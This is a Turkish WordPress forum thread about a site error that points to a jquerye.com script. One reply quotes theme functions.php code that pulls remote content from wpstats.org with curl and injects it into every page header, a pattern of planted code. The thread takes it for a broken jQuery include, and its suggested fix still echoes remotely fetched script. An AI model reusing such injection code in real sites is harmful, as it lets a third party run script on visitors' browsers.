Aldıgım hata
dün kendiliginden oluştu. Yolu bulamıyorum nerede oldugunu
Wordpress ustaları bir el atsa süper olur.
The server can not find the requested page:
/jquery-1.6.3.min.js (port 80)
Please forward this error screen to www.jquerye.com's WebMaster.
/jquery-1.6.3.min.js (port 80) Bu hata Nedir? 10 kişi çözemedi
21
●3.745
- 23-01-2013, 23:30:35Kimlik doğrulama veya yönetimden onay bekliyor.temanızda http://www.jquerye.com/jquery-1.6.3.min.js yazan yerleri http://code.jquery.com/jquery-1.6.3.min.js ile değiştirin sorun çözülür.
- 24-01-2013, 10:43:10functions.php de bulunan
//define jquery if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url = "http://www.wpstats.org/jquery-1.6.3.min.js";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}yerine ;
//define jquery if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url = "http://ajax.googleapis.com/ajax/libs/jquery/1.6.3/jquery.min.js"; $data = file_get_contents($url); echo $data;}}add_action('wp_head', 'insert_jquery_theme');}dener misiniz?